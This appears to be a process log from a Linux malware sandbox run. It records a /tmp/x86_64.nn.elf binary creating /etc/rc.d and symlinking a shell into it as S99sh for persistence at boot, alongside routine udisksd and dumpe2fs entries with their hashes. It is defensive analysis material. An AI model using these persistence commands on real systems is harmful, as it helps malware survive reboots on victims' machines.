                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/bin/mkdir
                                                                                                        Arguments:mkdir -p /etc/rc.d
                                                                                                        File size:88408 bytes
                                                                                                        MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/bin/sh
                                                                                                        Arguments:-
                                                                                                        File size:129816 bytes
                                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/bin/ln
                                                                                                        Arguments:ln -s /etc/init.d/sh /etc/rc.d/S99sh
                                                                                                        File size:76160 bytes
                                                                                                        MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/tmp/x86_64.nn.elf
                                                                                                        Arguments:-
                                                                                                        File size:97600 bytes
                                                                                                        MD5 hash:adf6b23cac984a3a3904655c9b93e95d

                                                                                                        Start time (UTC):03:22:56
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                                        Arguments:-
                                                                                                        File size:483056 bytes
                                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                        Start time (UTC):03:22:56
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                                        File size:31112 bytes
                                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/systemd/systemd
                                                                                                        Arguments:-
                                                                                                        File size:1620224 bytes
                                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                        File size:22760 bytes
                                                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                                        Arguments:-
                                                                                                        File size:483056 bytes
                                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                                        File size:31112 bytes
                                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                                        Arguments:-
                                                                                                        File size:483056 bytes
                                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                        Start time (UTC):03:22:57
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                                        File size:31112 bytes
                                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                        Start time (UTC):03:22:58
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                                        Arguments:-
                                                                                                        File size:483056 bytes
                                                                                                        MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                                        Start time (UTC):03:22:58
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/sbin/dumpe2fs
                                                                                                        Arguments:dumpe2fs -h /dev/dm-0
                                                                                                        File size:31112 bytes
                                                                                                        MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                                        Start time (UTC):03:22:58
                                                                                                        Start date (UTC):13/12/2024
                                                                                                        Path:/usr/lib/udisks2/udisksd
                                                                                                        Arguments:-
File size:483056 bytes
MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/sbin/dumpe2fs
Arguments:dumpe2fs -h /dev/dm-0
File size:31112 bytes
MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/lib/udisks2/udisksd
Arguments:-
File size:483056 bytes
MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/sbin/dumpe2fs
Arguments:dumpe2fs -h /dev/dm-0
File size:31112 bytes
MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/lib/udisks2/udisksd
Arguments:-
File size:483056 bytes
MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/sbin/dumpe2fs
Arguments:dumpe2fs -h /dev/dm-0
File size:31112 bytes
MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/lib/udisks2/udisksd
Arguments:-
File size:483056 bytes
MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):03:22:58
Start date (UTC):13/12/2024
Path:/usr/sbin/dumpe2fs
Arguments:dumpe2fs -h /dev/dm-0
File size:31112 bytes
MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):03:22:59
Start date (UTC):13/12/2024
Path:/usr/lib/udisks2/udisksd
Arguments:-
File size:483056 bytes
MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):03:22:59
Start date (UTC):13/12/2024
Path:/usr/sbin/dumpe2fs
Arguments:dumpe2fs -h /dev/dm-0
File size:31112 bytes
MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4